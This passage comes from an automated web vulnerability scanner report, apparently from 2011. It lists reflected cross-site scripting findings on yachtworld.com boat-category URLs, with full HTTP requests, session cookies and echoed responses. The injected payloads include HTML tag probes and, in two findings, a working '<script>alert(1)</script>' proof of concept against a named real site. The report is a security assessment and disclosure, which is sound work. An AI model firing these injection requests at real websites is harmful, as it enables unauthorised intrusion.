savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:54 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Bayliner/159a64"><script>alert(1)</script>1f1925a738a/A-1">
...[SNIP]...

3.198. http://www.yachtworld.com/boats/category/type/Beneteau/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Beneteau/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae415"><a>5a3397b884a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/typeae415"><a>5a3397b884a/Beneteau/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:36 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/typeae415"><a>5a3397b884a/Beneteau/1">
...[SNIP]...

3.199. http://www.yachtworld.com/boats/category/type/Beneteau/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Beneteau/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 462fc"><a>d205da5a30f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Beneteau462fc"><a>d205da5a30f/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:44 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Beneteau462fc"><a>d205da5a30f/A-1">
...[SNIP]...

3.200. http://www.yachtworld.com/boats/category/type/Beneteau/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Beneteau/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcfad"><script>alert(1)</script>9ee5d133a13 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Beneteau/1fcfad"><script>alert(1)</script>9ee5d133a13 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:51 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Beneteau/1fcfad"><script>alert(1)</script>9ee5d133a13/A-1">
...[SNIP]...

3.201. http://www.yachtworld.com/boats/category/type/Bertram/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Bertram/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dae87"><a>6a5a7d2476b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/typedae87"><a>6a5a7d2476b/Bertram/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:32 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/typedae87"><a>6a5a7d2476b/Bertram/1">
...[SNIP]...

3.202. http://www.yachtworld.com/boats/category/type/Bertram/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Bertram/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c806"><a>b4bf5174a11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Bertram3c806"><a>b4bf5174a11/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; 